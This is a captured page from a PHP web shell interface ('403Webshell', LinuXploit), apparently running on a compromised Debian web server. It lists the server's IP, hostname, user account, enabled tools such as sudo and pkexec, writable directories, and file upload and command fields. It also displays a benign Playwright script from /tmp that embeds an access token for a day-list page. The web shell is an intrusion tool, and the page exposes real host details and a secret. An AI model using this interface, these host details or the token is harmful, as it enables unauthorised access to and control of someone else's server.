403Webshell
Server IP : 202.61.199.114  /  Your IP : 216.73.217.139
Web Server : nginx/1.22.1
System : Linux de.arni-solutions.de 6.1.0-49-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
User : web20 ( 1018)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/thread-self/root/tmp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/thread-self/root/tmp/scroll.py
from playwright.sync_api import sync_playwright
TOK="77e34e0fefd409d1c03bfd64"; url="https://seaside.pacim.de/day-list.php?t="+TOK
with sync_playwright() as p:
    b=p.chromium.launch(); pg=b.new_context(viewport={"width":440,"height":820}).new_page()
    pg.goto(url, wait_until="networkidle"); pg.wait_for_timeout(500)
    plate=pg.eval_on_selector_all('#dl-body tr[data-out="0"]','rs=>rs[Math.min(rs.length-1,120)].getAttribute("data-plate")')
    pg.evaluate("window.scrollTo(0,1500)"); pg.wait_for_timeout(200)
    pg.fill('#dl-search', plate); pg.wait_for_timeout(800)
    tb=pg.eval_on_selector('.topbar','e=>e.offsetHeight')
    info=pg.evaluate("()=>{var rows=document.querySelectorAll('#dl-body tr');for(var i=0;i<rows.length;i++){if(rows[i].style.display!=='none'){return {top:Math.round(rows[i].getBoundingClientRect().top), plate:rows[i].getAttribute('data-plate')};}}return null;}")
    print("searched plate:", plate)
    print("topbar height:", tb, "| first visible row:", info)
    print("first hit positioned just below topbar:", bool(info) and abs(info['top']-tb) <= 16)
    b.close()

Youez - 2016 - github.com/yon3zu
LinuXploit